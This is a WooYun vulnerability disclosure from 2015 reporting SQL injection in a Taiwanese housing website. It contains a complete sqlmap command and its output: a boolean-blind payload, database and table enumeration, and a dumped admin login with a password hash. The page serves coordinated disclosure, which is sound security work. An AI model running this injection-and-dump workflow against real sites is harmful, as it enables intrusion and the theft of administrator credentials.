当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157398

漏洞标题:新屋網主站存在SQL注射漏洞(管理密码)(臺灣地區)

相关厂商:新屋網

漏洞作者: 路人甲

提交时间:2015-12-03 11:27

修复时间:2016-01-21 01:50

公开时间:2016-01-21 01:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

什么时候能买套房?

详细说明:

地址:http://**.**.**.**/topic_view.php?topicid=246

$ python sqlmap.py -u "http://**.**.**.**/topic_view.php?topicid=246" -p topicid --technique=B --random-agent --batch  --no-cast -D princetw_blog -T wp_users -C user_login,user_pass,user_email --dump


Database: princetw_blog
Table: wp_users
[1 entry]
+------------+------------------------------------+--------------------+
| user_login | user_pass | user_email |
+------------+------------------------------------+--------------------+
| admin | $P$9FplHSzboldLGi93hTXuuOdQ9WTE4v. | newhouse@**.**.**.** |
+------------+------------------------------------+--------------------+

漏洞证明:

---
web application technology: PHP 5.4.22, Apache 2.0.64
back-end DBMS: MySQL 5
available databases [4]:
[*] information_schema
[*] princetw_blog
[*] princetw_test
[*] princetw_utf
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topicid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: topicid=246 AND 7614=7614
---
web application technology: PHP 5.4.22, Apache 2.0.64
back-end DBMS: MySQL 5
Database: princetw_blog
[10 tables]
+-----------------------+
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topicid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: topicid=246 AND 7614=7614
---
web application technology: PHP 5.4.22, Apache 2.0.64
back-end DBMS: MySQL 5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topicid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: topicid=246 AND 7614=7614
---
web application technology: PHP 5.4.22, Apache 2.0.64
back-end DBMS: MySQL 5
Database: princetw_blog
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+---------------------+---------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topicid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: topicid=246 AND 7614=7614
---
web application technology: PHP 5.4.22, Apache 2.0.64
back-end DBMS: MySQL 5
Database: princetw_blog
+----------+---------+
| Table | Entries |
+----------+---------+
| wp_users | 1 |
+----------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topicid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: topicid=246 AND 7614=7614
---
web application technology: PHP 5.4.22, Apache 2.0.64
back-end DBMS: MySQL 5
Database: princetw_blog
Table: wp_users
[1 entry]
+------------+------------------------------------+--------------------+
| user_login | user_pass | user_email |
+------------+------------------------------------+--------------------+
| admin | $P$9FplHSzboldLGi93hTXuuOdQ9WTE4v. | newhouse@**.**.**.** |
+------------+------------------------------------+--------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-07 01:40

厂商回复:

感謝通報

最新状态:

2016-02-20:HITCON 於接獲通報後多次 email 該網站所示之服務信箱,至漏洞公開時仍無回應。